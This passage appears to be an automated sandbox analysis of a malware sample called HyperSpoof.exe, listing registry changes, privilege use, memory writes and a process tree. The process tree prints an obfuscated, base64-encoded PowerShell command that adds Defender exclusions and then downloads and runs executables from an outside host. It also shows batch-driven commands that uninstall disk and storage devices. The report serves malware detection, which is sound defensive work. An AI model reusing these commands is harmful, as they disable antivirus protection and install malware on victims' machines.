4868	schtasks.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Modifies registry class 1 IoCs

Processes:

.sphyperRuntimedhcpSvc.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings .sphyperRuntimedhcpSvc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings	.sphyperRuntimedhcpSvc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe.sphyperRuntimedhcpSvc.exe

pid	process
2432	HyperSpoof.exe
2432	HyperSpoof.exe
2432	HyperSpoof.exe
2432	HyperSpoof.exe
2432	HyperSpoof.exe
2432	HyperSpoof.exe
3884	powershell.exe
3884	powershell.exe
4304	DevManView.exe
4304	DevManView.exe
3668	DevManView.exe
3668	DevManView.exe
2304	DevManView.exe
2304	DevManView.exe
1928	DevManView.exe
1928	DevManView.exe
3656	DevManView.exe
3656	DevManView.exe
4992	DevManView.exe
4992	DevManView.exe
2952	DevManView.exe
2952	DevManView.exe
3396	DevManView.exe
3396	DevManView.exe
1844	DevManView.exe
1844	DevManView.exe
3532	DevManView.exe
3532	DevManView.exe
4524	DevManView.exe
4524	DevManView.exe
4536	DevManView.exe
4536	DevManView.exe
4312	DevManView.exe
4312	DevManView.exe
2980	DevManView.exe
2980	DevManView.exe
2232	DevManView.exe
2232	DevManView.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe
3988	.sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

HpsrSpoof.exedllhost.exe

pid process

5036 HpsrSpoof.exe
5660 dllhost.exe
Suspicious behavior: LoadsDriver 24 IoCs

Processes:

pid process

652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652

pid	process
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe.sphyperRuntimedhcpSvc.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe

description	pid	process
Token: SeDebugPrivilege	2432	HyperSpoof.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeBackupPrivilege	4304	DevManView.exe
Token: SeRestorePrivilege	4304	DevManView.exe
Token: SeTakeOwnershipPrivilege	4304	DevManView.exe
Token: SeImpersonatePrivilege	4304	DevManView.exe
Token: SeBackupPrivilege	3668	DevManView.exe
Token: SeRestorePrivilege	3668	DevManView.exe
Token: SeTakeOwnershipPrivilege	3668	DevManView.exe
Token: SeBackupPrivilege	2304	DevManView.exe
Token: SeRestorePrivilege	2304	DevManView.exe
Token: SeTakeOwnershipPrivilege	2304	DevManView.exe
Token: SeImpersonatePrivilege	3668	DevManView.exe
Token: SeImpersonatePrivilege	2304	DevManView.exe
Token: SeBackupPrivilege	1928	DevManView.exe
Token: SeRestorePrivilege	1928	DevManView.exe
Token: SeTakeOwnershipPrivilege	1928	DevManView.exe
Token: SeBackupPrivilege	3656	DevManView.exe
Token: SeRestorePrivilege	3656	DevManView.exe
Token: SeTakeOwnershipPrivilege	3656	DevManView.exe
Token: SeBackupPrivilege	1844	DevManView.exe
Token: SeRestorePrivilege	1844	DevManView.exe
Token: SeTakeOwnershipPrivilege	1844	DevManView.exe
Token: SeBackupPrivilege	4992	DevManView.exe
Token: SeRestorePrivilege	4992	DevManView.exe
Token: SeTakeOwnershipPrivilege	4992	DevManView.exe
Token: SeImpersonatePrivilege	1928	DevManView.exe
Token: SeBackupPrivilege	2952	DevManView.exe
Token: SeRestorePrivilege	2952	DevManView.exe
Token: SeTakeOwnershipPrivilege	2952	DevManView.exe
Token: SeBackupPrivilege	3396	DevManView.exe
Token: SeRestorePrivilege	3396	DevManView.exe
Token: SeTakeOwnershipPrivilege	3396	DevManView.exe
Token: SeImpersonatePrivilege	3656	DevManView.exe
Token: SeImpersonatePrivilege	3396	DevManView.exe
Token: SeImpersonatePrivilege	1844	DevManView.exe
Token: SeBackupPrivilege	3532	DevManView.exe
Token: SeRestorePrivilege	3532	DevManView.exe
Token: SeTakeOwnershipPrivilege	3532	DevManView.exe
Token: SeImpersonatePrivilege	4992	DevManView.exe
Token: SeImpersonatePrivilege	2952	DevManView.exe
Token: SeImpersonatePrivilege	3532	DevManView.exe
Token: SeBackupPrivilege	4524	DevManView.exe
Token: SeRestorePrivilege	4524	DevManView.exe
Token: SeTakeOwnershipPrivilege	4524	DevManView.exe
Token: SeImpersonatePrivilege	4524	DevManView.exe
Token: SeDebugPrivilege	3988	.sphyperRuntimedhcpSvc.exe
Token: SeBackupPrivilege	4536	DevManView.exe
Token: SeRestorePrivilege	4536	DevManView.exe
Token: SeTakeOwnershipPrivilege	4536	DevManView.exe
Token: SeImpersonatePrivilege	4536	DevManView.exe
Token: SeBackupPrivilege	4312	DevManView.exe
Token: SeRestorePrivilege	4312	DevManView.exe
Token: SeTakeOwnershipPrivilege	4312	DevManView.exe
Token: SeBackupPrivilege	2980	DevManView.exe
Token: SeRestorePrivilege	2980	DevManView.exe
Token: SeTakeOwnershipPrivilege	2980	DevManView.exe
Token: SeBackupPrivilege	2232	DevManView.exe
Token: SeRestorePrivilege	2232	DevManView.exe
Token: SeTakeOwnershipPrivilege	2232	DevManView.exe
Token: SeImpersonatePrivilege	4312	DevManView.exe
Token: SeImpersonatePrivilege	2980	DevManView.exe
Token: SeImpersonatePrivilege	2232	DevManView.exe
Token: SeLoadDriverPrivilege	4312	DevManView.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

HyperSpoof.exepowershell.exeHpsrSpoof.execmd.execmd.execonhostsft.exesphyperRuntimedhcpSvc.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2432 wrote to memory of 3884	2432	HyperSpoof.exe	powershell.exe
PID 2432 wrote to memory of 3884	2432	HyperSpoof.exe	powershell.exe
PID 3884 wrote to memory of 5036	3884	powershell.exe	HpsrSpoof.exe
PID 3884 wrote to memory of 5036	3884	powershell.exe	HpsrSpoof.exe
PID 3884 wrote to memory of 880	3884	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 3884 wrote to memory of 880	3884	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 3884 wrote to memory of 880	3884	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 3884 wrote to memory of 4736	3884	powershell.exe	conhostsft.exe
PID 3884 wrote to memory of 4736	3884	powershell.exe	conhostsft.exe
PID 3884 wrote to memory of 4736	3884	powershell.exe	conhostsft.exe
PID 5036 wrote to memory of 396	5036	HpsrSpoof.exe	cmd.exe
PID 5036 wrote to memory of 396	5036	HpsrSpoof.exe	cmd.exe
PID 396 wrote to memory of 2532	396	cmd.exe	Volumeid64.exe
PID 396 wrote to memory of 2532	396	cmd.exe	Volumeid64.exe
PID 5036 wrote to memory of 5044	5036	HpsrSpoof.exe	schtasks.exe
PID 5036 wrote to memory of 5044	5036	HpsrSpoof.exe	schtasks.exe
PID 5044 wrote to memory of 4304	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 4304	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 3668	5044	cmd.exe	AMIDEWINx64.exe
PID 5044 wrote to memory of 3668	5044	cmd.exe	AMIDEWINx64.exe
PID 5044 wrote to memory of 2304	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 2304	5044	cmd.exe	DevManView.exe
PID 4736 wrote to memory of 1468	4736	conhostsft.exe	.conhostsft.exe
PID 4736 wrote to memory of 1468	4736	conhostsft.exe	.conhostsft.exe
PID 5044 wrote to memory of 1928	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 1928	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 3396	5044	cmd.exe	mousocoreworker.exe
PID 5044 wrote to memory of 3396	5044	cmd.exe	mousocoreworker.exe
PID 5044 wrote to memory of 1844	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 1844	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 2952	5044	cmd.exe	Volumeid64.exe
PID 5044 wrote to memory of 2952	5044	cmd.exe	Volumeid64.exe
PID 5044 wrote to memory of 3532	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 3532	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 3656	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 3656	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 4992	5044	cmd.exe	AMIDEWINx64.exe
PID 5044 wrote to memory of 4992	5044	cmd.exe	AMIDEWINx64.exe
PID 880 wrote to memory of 3988	880	sphyperRuntimedhcpSvc.exe	.sphyperRuntimedhcpSvc.exe
PID 880 wrote to memory of 3988	880	sphyperRuntimedhcpSvc.exe	.sphyperRuntimedhcpSvc.exe
PID 5044 wrote to memory of 4524	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 4524	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 4536	5044	cmd.exe	schtasks.exe
PID 5044 wrote to memory of 4536	5044	cmd.exe	schtasks.exe
PID 5044 wrote to memory of 4312	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 4312	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 2980	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 2980	5044	cmd.exe	Conhost.exe
PID 5044 wrote to memory of 2232	5044	cmd.exe	DevManView.exe
PID 5044 wrote to memory of 2232	5044	cmd.exe	DevManView.exe
PID 5036 wrote to memory of 3672	5036	HpsrSpoof.exe	cmd.exe
PID 5036 wrote to memory of 3672	5036	HpsrSpoof.exe	cmd.exe
PID 3672 wrote to memory of 4700	3672	cmd.exe	AMIDEWINx64.exe
PID 3672 wrote to memory of 4700	3672	cmd.exe	AMIDEWINx64.exe
PID 5036 wrote to memory of 4684	5036	HpsrSpoof.exe	cmd.exe
PID 5036 wrote to memory of 4684	5036	HpsrSpoof.exe	cmd.exe
PID 4684 wrote to memory of 1392	4684	cmd.exe	AMIDEWINx64.exe
PID 4684 wrote to memory of 1392	4684	cmd.exe	AMIDEWINx64.exe
PID 5036 wrote to memory of 2896	5036	HpsrSpoof.exe	BackgroundTransferHost.exe
PID 5036 wrote to memory of 2896	5036	HpsrSpoof.exe	BackgroundTransferHost.exe
PID 2896 wrote to memory of 4548	2896	cmd.exe	AMIDEWINx64.exe
PID 2896 wrote to memory of 4548	2896	cmd.exe	AMIDEWINx64.exe
PID 5036 wrote to memory of 3932	5036	HpsrSpoof.exe	cmd.exe
PID 5036 wrote to memory of 3932	5036	HpsrSpoof.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:5036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0G4H-HCRL
4⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0G4H-HCRL
5⤵
- Executes dropped EXE
PID:2532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:5044

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Windows\system32\cmd.exe
